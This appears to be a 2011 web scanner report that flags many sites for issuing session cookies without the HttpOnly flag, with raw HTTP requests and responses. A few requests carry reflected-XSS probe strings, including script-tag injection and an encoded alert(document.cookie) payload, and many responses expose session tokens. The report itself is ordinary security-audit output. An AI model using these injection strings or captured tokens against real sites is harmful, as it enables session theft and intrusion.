<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /MCIndex.asp HTTP/1.1 Host: info.bisk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 06 Feb 2011 16:01:20 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 363 Content-Type: text/html Set-Cookie: MCIDtype=external; expires=Tue, 08-Mar-2011 05:00:00 GMT; path=/ Set-Cookie: MCIDCookie=9505; expires=Tue, 08-Mar-2011 05:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDCABBARTR=LOJKGAOCENEJFOGJELJDONMB; path=/ Cache-control: private
<html> <head> <meta name="GENERATOR" content="Microsoft Visual Studio 6.0"> </head> <body> <script language=javascript> <!-- var strRedir = "http://www.EducatorEducation.com/?source=196337ZX ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /opt_out/ch_optout.asp HTTP/1.1 Host: intellitxt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 3422 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDQADSARBD=HFEGFMCCJNCMNPGAHAKHLIGI; path=/ p3p: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" X-Powered-By: ASP.NET Date: Sat, 05 Feb 2011 22:51:06 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /s/svrg.asp HTTP/1.1 Host: internetmailmanager.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 21:51:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 115 Content-Type: text/html Set-Cookie: ASPSESSIONIDAABCDBSC=LIBJGAECDANCKFHGFFNBFDND; path=/ Cache-control: private
Invalid registration form. Please contact support at <a href="mailto:support@303media.com">support@303media.com</a>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webtracker/track.html HTTP/1.1 Host: live.activeconversion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _wt_31021=1296942871924|f64d-6178-34ed-5f2e12df7d201ca|0; JSESSIONID=9042D11EABAF4C8F5DEB02F41173999D;
Response
HTTP/1.1 302 Moved Temporarily Date: Sat, 05 Feb 2011 22:51:18 GMT Server: Apache Pragma: No-cache Cache-Control: no-cache,no-store,max-age=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=E261474CC942CC59A3C7A67CA36366D2; Path=/webtracker Location: http://live.activeconversion.com/webtracker/mainMenu.html Content-Length: 0 Connection: close Content-Type: text/html;charset=ISO-8859-1
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /webtracker/track2.html?method=track&pid=31021&uclkt=1&alh=http%3A//www.owneriq.com/ownership-targeting%3Fsrc%3D728x90_blue&avc=f64d-6178-34ed-5f2e12df7d201ca&source=&keyword=&ref=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&pageTitle=Ownership%20Targeting%20%7C%20OwnerIQ&pageUrl=http%3A%2F%2Fwww.owneriq.com%2Fownership-targeting%3Fsrc%3D728x90_blue&java=1&amcs=0.41058127977885306 HTTP/1.1 Host: live.activeconversion.com Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:31:59 GMT Server: Apache Pragma: no-cache Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: JSESSIONID=3DD7C88CAE89EFB650276CE09BCE82B1; Path=/webtracker Set-Cookie: _wt_31021=1296945129219|f64d-6178-34ed-5f2e12df7d201ca|0; Max-Age=630720000;Path=/; HttpOnly P3P: policyref="http://www.activeconversion.com/w3c/p3p.xml", CP="NOI DSP LAW PSA OUR IND STA NAV COM" Connection: close Content-Type: image/png Content-Length: 68
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=mgd19n2q9c9jnocqqmbrnk5p31; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.php?v_sex='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000335)%3C/script%3E&v_exp=1&v_find=1 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: lovely-faces.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:34:13 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: private, max-age=900, pre-check=900 Vary: Accept-Encoding Set-Cookie: PHPSESSID=mgd19n2q9c9jnocqqmbrnk5p31; path=/ Last-Modified: Sat, 05 Feb 2011 21:01:02 GMT Content-Type: text/html; charset=utf-8 Content-Length: 34395
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=U ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: mad4milk.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:04:24 GMT Server: Apache/2.0.54 X-Powered-By: PHP/5.2.14 Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229aa9caca178f871b7614d81a9de0e019%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1297008265%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Sun, 06-Feb-2011 18:04:25 GMT; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 2866
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: multiply.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: newstrust.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.6.35 Date: Sat, 05 Feb 2011 22:58:22 GMT Content-Type: text/html; charset=utf-8 Connection: close Set-Cookie: _newstrust_session=0ce76bfbf0c27ac307c69589440188fd; path=/ Status: 200 OK ETag: "a62932024cf879d7f7427791eb6c7c8f" X-Runtime: 0.01216 Content-Length: 95979 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/acctsumm/us/action HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/logon/us/action HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/lgpl-license.php HTTP/1.1 Host: opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /search/malayalam-kochupusthakam-free-download.html HTTP/1.1 Host: pdfdatabase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.6.39 Date: Sun, 06 Feb 2011 06:11:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.10 Set-Cookie: PHPSESSID=e724f4995ab87e227b65ec2f714edd90; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 39330
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: phonefavs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:58:35 GMT Server: Apache/2.0.54 X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=1b89eafffdaa51775d731fea3360282e; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 6511
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.1//EN" "http://www.openmobilealliance.org/tech/DTD/xhtml-mobile11.dtd"> <html xmlns="http://www.w3.org/199 ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /$|zone.msn.com|xbox.com|www.aol.com/$|http:/Webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: photobucket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=1l5vulbvebogrm90n8ljmbpqf0; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: ping.fm Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/loyalty/us/rewards/mracctmgmt/acctsumm HTTP/1.1 Host: rewards.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en"> <head> <title> American Express - Mem ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /regman/mem/initsession?sessionargs=YToyOntzOjM6InVyaSI7czoxMTQ6Ii9leC9tZmcvaGVhZGxpbmUvbS9hcmllbnM0Nzg4OCUyNTI3JTI1M2JhbGVydCUyNTI4ZG9jdW1lbnQuY29va2llJTI1MjklMjUyZiUyNTJmOGZjZjE2N2QyODEvZC90eXBlL3Byb2R1Y3RfcHJvYmxlbSI7czo2OiJzZXJ2ZXIiO3M6MzE6ImhvbWVhcHBsaWFuY2UubWFudWFsc29ubGluZS5jb20iO30, HTTP/1.1 Host: session.owneriq.net Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /en-us/articles/intel-cloud-builders/?cid\u003dvibrantlogo4 HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sites/oss/ HTTP/1.1 Host: software.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: sphinn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:59:23 GMT Server: Apache/2.2 Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22ebd855b093eff9801dff359c0bc0930d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1296946763%3Bs%3A10%3A%22rememberme%22%3Bi%3A0%3B%7D28f3522411827ac80c00f312bf0c11e5; expires=Sun, 06-Feb-2011 00:59:23 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 57352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://open ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /mw0305l/mywebex/default.do HTTP/1.1 Host: splunk.webex.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:59:22 GMT Server: Apache Content-Length: 3639 Set-Cookie: JSESSIONID=vG1dNNWKvTrnmZhJc7QHlY8p5PBcRt6fsv8sVgVQQ5zk46f6XVL2!-1021108312; path=/ P3P: CP="CAO DSP COR CURo ADMo DEVo TAIo CONo OUR BUS IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Set-Cookie: NSC_kmkcwxm=404467a20838;path=/ Connection: close Content-Type: text/html
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /intellitxt/switch.asp?ipid=6648&state=query HTTP/1.1 Host: starpulse.us.intellitxt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=EDB4D23E026138AF23EF5F1050BE5C48; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: text/html Content-Length: 20 Date: Sat, 05 Feb 2011 23:01:19 GMT Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /t/v1/clk HTTP/1.1 Host: t.mookie1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="/t/v1/clk/cc">here</a>.</p> <hr> <address>Apach ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /trackalyze.asp?r=http%3A//homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281/d/type/product_problem&p=http%3A//www.owneriq.com/ownership-targeting%3Fsrc%3D728x90_blue&i=16592 HTTP/1.1 Host: t2.trackalyzer.com Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: trackalyzer=123144565411843
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /NA7/ats/careers/jobSearch.jsp HTTP/1.1 Host: tbe.taleo.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 500 Internal Server Error Date: Sat, 05 Feb 2011 23:01:21 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: Wed, 31 Dec 1969 23:59:59 GMT Set-Cookie: JSESSIONID=8BBB3E3E4A16FEEEBAE957F8D88AD6A4.NA7_primary_jvm; Path=/NA7/ats Content-Length: 2209 Connection: close Content-Type: text/html;charset=UTF-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: technorati.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: tipd.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1 Host: travel.aol.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
guest_id=129694277128817686; path=/; expires=Mon, 07 Mar 2011 21:52:51 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 21:52:51 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 21:52:51 +0000 2011-65977-37832 ETag: "9cbed84ee46357ad6eeda7e5594d953e" Last-Modified: Sat, 05 Feb 2011 21:52:51 GMT X-Runtime: 0.00464 Content-Type: text/html; charset=utf-8 Content-Length: 43885 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296942771285663; path=/; expires=Sat, 12-Feb-11 21:52:51 GMT; domain=.twitter.com Set-Cookie: guest_id=129694277128817686; path=/; expires=Mon, 07 Mar 2011 21:52:51 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCFks0PctAToHaWQiJTI1M2RkNWFjYWE5MzQ0%250ANzI3OTY5MzUwMjMxMDk1Njk4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--b166f799ab6822f231f1cb3f1d2746bfa9e0bc22; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
guest_id=129694277103136378; path=/; expires=Mon, 07 Mar 2011 21:52:51 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ORTHOSuperSite HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 21:52:51 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 21:52:51 +0000 2011-54414-25157 ETag: "a22e3a1e0872e4ff690e148e7be6dce6" Last-Modified: Sat, 05 Feb 2011 21:52:51 GMT X-Runtime: 0.00565 Content-Type: text/html; charset=utf-8 Content-Length: 50362 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296942771024590; path=/; expires=Sat, 12-Feb-11 21:52:51 GMT; domain=.twitter.com Set-Cookie: guest_id=129694277103136378; path=/; expires=Mon, 07 Mar 2011 21:52:51 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCFgr0PctAToHaWQiJWMzNjM4Yjc5MDhlOWY3%250AYmIyOTNiM2FkMzU3NmNlNTUzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--73c6365753d94a587faec491fa68d9b7ca42e7ce; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129694570819625750; path=/; expires=Mon, 07 Mar 2011 22:41:48 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /VibrantMedia HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 22:41:48 GMT Server: hi Status: 200 OK X-Transaction: Sat Feb 05 22:41:48 +0000 2011-22776-43302 ETag: "58cb376bf09671dadfea46b170bfe723" Last-Modified: Sat, 05 Feb 2011 22:41:48 GMT X-Runtime: 0.00548 Content-Type: text/html; charset=utf-8 Content-Length: 60206 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296945708188753; path=/; expires=Sat, 12-Feb-11 22:41:48 GMT; domain=.twitter.com Set-Cookie: guest_id=129694570819625750; path=/; expires=Mon, 07 Mar 2011 22:41:48 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCKX8%252FPctAToHaWQiJWZiYWE2NTExMzU3MTU2%250AODhmODhmNjIyMTc3MTIxOTU0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--41b706acf658b115a8b0aaba3804015520340aec; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
guest_id=129694570698256586; path=/; expires=Mon, 07 Mar 2011 22:41:46 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /owneriq HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
